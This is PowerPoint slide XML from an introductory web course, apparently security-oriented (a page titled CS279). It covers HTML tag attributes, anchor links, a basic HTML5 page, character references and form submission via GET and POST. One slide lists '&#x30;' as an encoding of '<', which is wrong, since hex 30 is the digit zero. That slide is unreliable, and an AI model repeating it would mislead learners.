        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="1994876"/>
            <a:ext cx="1368747"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Request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="HG Mincho Light J" charset="0"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3006800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Tags </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tags can have “attributes” that provide metadata about the tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Attributes live inside the start tag after the tag name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Four different syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;foo bar&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>foo is the tag name and bar is an attribute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;foo bar=baz&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The attribute bar has the value baz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;foo bar=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>baz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;foo bar="baz"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Multiple attributes are separated by spaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;foo bar='baz' disabled required="true"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="726151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Hyperlink</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The anchor tag is used to create a hyperlink</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute is used provide the URI </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Text inside the anchor tag is the text of the hyperlink</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&gt;Google&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3865512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Basic HTML 5 Page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;!DOCTYPE html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    &lt;meta charset="UTF-8"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    &lt;title&gt;CS279&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/"&gt;Text&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3337133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Character References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Special characters can be included in HTML using &lt; &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> " &amp; = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encode the character reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also referred to in HTML &lt; 5.0 as “entity reference” or “entity encoding”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Three types, each starts with &amp; and ends with ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Named character reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;&lt;predefined name&gt;;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decimal numeric character reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;#&lt;decimal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unicode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hexadecimal numeric character reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;#x&lt;hexadecimal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unicode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="627767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HTML – Character References Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The ampersand (&amp;) is used to start a character reference, so it must be encoded as a character reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&amp;amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&amp;#38;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&amp;#x26;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&amp;#x00026;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1975330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HTML – Character References Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>é</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&amp;eacute;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&amp;#233;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&amp;#xe9;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="442770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HTML – Character References Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;#60;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;#x30;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;#x00030;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1564611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Forms </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A form is a component of a Web page that has form controls, such as text fields, buttons, checkboxes, range controls, or color pickers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Form is a way to create a complex HTTP request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The action attribute contains the URI to submit the HTTP request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Default is the current URI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The method attribute is the HTTP method to use in the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>GET or POST, default is GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="985805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Forms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Children input tags of the form are transformed into either query URL parameters or HTTP request body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Difference is based on the method attribute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET passes data in the query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST passes data in the body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data is encoded as either “application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” or “multipart/form-data”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET always uses “application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST depends on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>enctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute of form, default is “application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"multipart/form-data" is mainly used to upload files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1479494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Forms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data sent as name-value pairs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data from the input tags (as well as others)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;input type="text" name="foo" value="bar”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Name is taken from the input tag’s name attribute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Value is taken either from the input tag’s value attribute or the user-supplied input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Empty string if neither is present</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2464145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r>
              <a:rPr lang="en-US"/>
              <a:t>Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714757" name="Oval 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="2166326"/>
            <a:ext cx="1055688" cy="407194"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BFBFBF"/>
          </a:soli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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714758" name="Oval 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="2109175"/>
            <a:ext cx="1143000" cy="472679"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BFBFBF"/>
          </a:solidFill>
          <a:ln w="12573">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Web Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714759" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143001" y="2909276"/>
            <a:ext cx="1120820"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Reply</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="HG Mincho Light J" charset="0"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714760" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2209800" y="2680676"/>
            <a:ext cx="228600" cy="4000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61" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="2566376"/>
            <a:ext cx="228600" cy="4572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62" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
